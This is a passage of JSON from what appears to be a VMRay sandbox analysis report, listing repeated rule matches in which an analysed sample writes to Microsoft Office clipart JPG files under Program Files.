"technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382944.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382944.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39268", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382944.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382947.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382947.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39283", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382947.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382948.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382948.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39300", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382948.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382950.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382950.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39319", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382950.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382952.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382952.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39336", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382952.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382954.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382954.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39353", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382954.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382955.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382955.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39370", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382955.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382957.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382957.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39387", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382957.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382958.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382958.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39406", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382958.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382959.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382959.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39425", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382959.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382960.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382960.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39442", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382960.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382961.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382961.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39461", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382961.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382962.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382962.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39480", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382962.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382963.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382963.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39499", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382963.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382965.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382965.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39516", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382965.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382966.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382966.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39535", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382966.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382967.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382967.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39554", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382967.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382968.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382968.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39571", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382968.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382969.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382969.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39590", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382969.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382970.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382970.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39607", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382970.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384862.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0384862.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39624", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0384862.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384885.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0384885.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39643", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0384885.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384888.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0384888.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39660", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0384888.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384895.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0384895.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39677", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0384895.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384900.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0384900.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39690", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0384900.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386120.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0386120.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39705", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0386120.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386267.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0386267.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39714", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0386267.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386270.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0386270.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39725", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0386270.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386485.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0386485.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39732", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0386485.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386764.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0386764.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39739", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0386764.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387337.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0387337.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39748", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0387337.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387578.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0387578.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_39761", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0387578.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387591.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0387591.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { 